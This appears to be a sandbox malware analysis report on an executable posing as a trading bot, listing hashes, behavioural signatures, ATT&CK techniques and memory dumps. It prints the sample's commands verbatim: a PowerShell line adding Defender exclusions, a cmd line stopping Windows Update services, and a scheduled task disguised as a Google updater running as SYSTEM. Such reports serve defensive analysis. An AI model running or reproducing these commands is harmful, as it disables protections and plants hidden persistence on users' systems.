24e0cad1fb1660de0d63c928343be126666e964e9a16fbb30350586258b0e146

Analysis

max time kernel
9s
max time network
83s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
09/07/2023, 19:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TRADINGBOTexe.exe
Size

9.9MB
MD5

5929435942fb70609a38af09caaf79c5
SHA1

6b724e7f68bb82c04397774dcf3a50b4217313f8
SHA256

24e0cad1fb1660de0d63c928343be126666e964e9a16fbb30350586258b0e146
SHA512

27bf0a66ab54b04a21df97f1867f81b9d77127dba0a4237288556af9ead3142be2b89f79d371b58094e2d3ff678b43c50325ff305173db599971113e34ac4f7e
SSDEEP

196608:DdUuyGgNKgQ/kgOFVo5QobOMwe3OPrzucNmwj3tgbXwFriutnnc0R2XxyxK7wOkw:DzJzkgO2Qotwe3OPrzucNmwj3tgbXwFl

Score

10^/10

evasion

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 1976 created 3148	1976	TRADINGBOTexe.exe	60
PID 1976 created 3148	1976	TRADINGBOTexe.exe	60
PID 1976 created 3148	1976	TRADINGBOTexe.exe	60
PID 1976 created 3148	1976	TRADINGBOTexe.exe	60

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1976 set thread context of 4212	1976	TRADINGBOTexe.exe	96

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
976	sc.exe
3764	sc.exe
2584	sc.exe
4524	sc.exe
1596	sc.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1976	TRADINGBOTexe.exe
1976	TRADINGBOTexe.exe
2296	powershell.exe
2296	powershell.exe
1976	TRADINGBOTexe.exe
1976	TRADINGBOTexe.exe
1976	TRADINGBOTexe.exe
1976	TRADINGBOTexe.exe
1976	TRADINGBOTexe.exe
1976	TRADINGBOTexe.exe
4212	dialer.exe
4212	dialer.exe
3044	powershell.exe
3044	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	4212	dialer.exe
Token: SeDebugPrivilege	3044	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1828 wrote to memory of 1596	1828	cmd.exe	91
PID 1828 wrote to memory of 1596	1828	cmd.exe	91
PID 1828 wrote to memory of 976	1828	cmd.exe	92
PID 1828 wrote to memory of 976	1828	cmd.exe	92
PID 1828 wrote to memory of 3764	1828	cmd.exe	93
PID 1828 wrote to memory of 3764	1828	cmd.exe	93
PID 1828 wrote to memory of 2584	1828	cmd.exe	94
PID 1828 wrote to memory of 2584	1828	cmd.exe	94
PID 1828 wrote to memory of 4524	1828	cmd.exe	95
PID 1828 wrote to memory of 4524	1828	cmd.exe	95
PID 1976 wrote to memory of 4212	1976	TRADINGBOTexe.exe	96

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3148
- C:\Users\Admin\AppData\Local\Temp\TRADINGBOTexe.exe
  "C:\Users\Admin\AppData\Local\Temp\TRADINGBOTexe.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1828
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1596
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:976
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3764
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2584
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4524
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yubtcja#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ecceac16628651c18879d836acfcb062

SHA1
420502b3e5220a01586c59504e94aa1ee11982c9

SHA256
58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9

SHA512
be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_myzcvplc.3s2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/396-177-0x0000021D1B040000-0x0000021D1B067000-memory.dmp

Filesize
156KB

Download
memory/396-194-0x0000021D1B040000-0x0000021D1B067000-memory.dmp

Filesize
156KB

Download
memory/396-180-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/532-185-0x00000200B5F00000-0x00000200B5F27000-memory.dmp

Filesize
156KB

Download
memory/532-187-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/532-196-0x00000200B5F00000-0x00000200B5F27000-memory.dmp

Filesize
156KB

Download
memory/628-167-0x000002B7BD9A0000-0x000002B7BD9C7000-memory.dmp

Filesize
156KB

Download
memory/628-189-0x000002B7BD9A0000-0x000002B7BD9C7000-memory.dmp

Filesize
156KB

Download
memory/628-168-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/628-165-0x000002B7BD970000-0x000002B7BD991000-memory.dmp

Filesize
132KB

Download
memory/684-190-0x0000019EC28E0000-0x0000019EC2907000-memory.dmp

Filesize
156KB

Download
memory/684-169-0x0000019EC28E0000-0x0000019EC2907000-memory.dmp

Filesize
156KB

Download
memory/684-172-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/704-195-0x000001A02F600000-0x000001A02F627000-memory.dmp

Filesize
156KB

Download
memory/704-243-0x000001A02F600000-0x000001A02F627000-memory.dmp

Filesize
156KB

Download
memory/704-197-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/964-192-0x000002145EFD0000-0x000002145EFF7000-memory.dmp

Filesize
156KB

Download
memory/964-176-0x000002145EFD0000-0x000002145EFF7000-memory.dmp

Filesize
156KB

Download
memory/964-179-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1040-199-0x0000019768D20000-0x0000019768D47000-memory.dmp

Filesize
156KB

Download
memory/1040-201-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1044-247-0x0000027726F60000-0x0000027726F87000-memory.dmp

Filesize
156KB

Download
memory/1044-205-0x0000027726F60000-0x0000027726F87000-memory.dmp

Filesize
156KB

Download
memory/1044-206-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1108-209-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1108-250-0x0000017319770000-0x0000017319797000-memory.dmp

Filesize
156KB

Download
memory/1108-207-0x0000017319770000-0x0000017319797000-memory.dmp

Filesize
156KB

Download
memory/1188-213-0x000001FD41D70000-0x000001FD41D97000-memory.dmp

Filesize
156KB

Download
memory/1188-214-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1188-255-0x000001FD41D70000-0x000001FD41D97000-memory.dmp

Filesize
156KB

Download
memory/1236-215-0x0000013DC9310000-0x0000013DC9337000-memory.dmp

Filesize
156KB

Download
memory/1236-217-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1236-260-0x0000013DC9310000-0x0000013DC9337000-memory.dmp

Filesize
156KB

Download
memory/1252-223-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1252-221-0x000001E3A17B0000-0x000001E3A17D7000-memory.dmp

Filesize
156KB

Download
memory/1252-266-0x000001E3A17B0000-0x000001E3A17D7000-memory.dmp

Filesize
156KB

Download
memory/1340-227-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1340-225-0x000002E485990000-0x000002E4859B7000-memory.dmp

Filesize
156KB

Download
memory/1360-231-0x00007FFED2590000-0x00007FFED25A0000-memory.dmp

Filesize
64KB

Download
memory/1360-228-0x000001C11CBD0000-0x000001C11CBF7000-memory.dmp

Filesize
156KB

Download
memory/1368-232-0x0000015888180000-0x00000158881A7000-memory.dmp

Filesize
156KB

Download
memory/1976-173-0x00007FF6D3870000-0x00007FF6D4261000-memory.dmp

Filesize
9.9MB

Download
memory/2296-145-0x00000259ABF60000-0x00000259ABF70000-memory.dmp

Filesize
64KB

Download
memory/2296-133-0x00000259AC010000-0x00000259AC032000-memory.dmp

Filesize
136KB

Download
memory/2296-143-0x00000259ABF60000-0x00000259ABF70000-memory.dmp

Filesize
64KB

Download
memory/2296-144-0x00000259ABF60000-0x00000259ABF70000-memory.dmp

Filesize
64KB

Download
memory/3044-164-0x000001A8BD560000-0x000001A8BD570000-memory.dmp

Filesize
64KB

Download
memory/3044-162-0x000001A8BD560000-0x000001A8BD570000-memory.dmp

Filesize
64KB

Download
memory/3044-184-0x000001A8D7700000-0x000001A8D784E000-memory.dmp

Filesize
1.3MB

Download
memory/3044-163-0x000001A8BD560000-0x000001A8BD570000-memory.dmp

Filesize
64KB

Download
memory/4212-149-0x00007FFF12510000-0x00007FFF12705000-memory.dmp

Filesize
2.0MB

Download
memory/4212-181-0x00007FF772E40000-0x00007FF772E69000-memory.dmp

Filesize
164KB

Download
memory/4212-150-0x00007FFF10690000-0x00007FFF1074E000-memory.dmp

Filesize
760KB

Download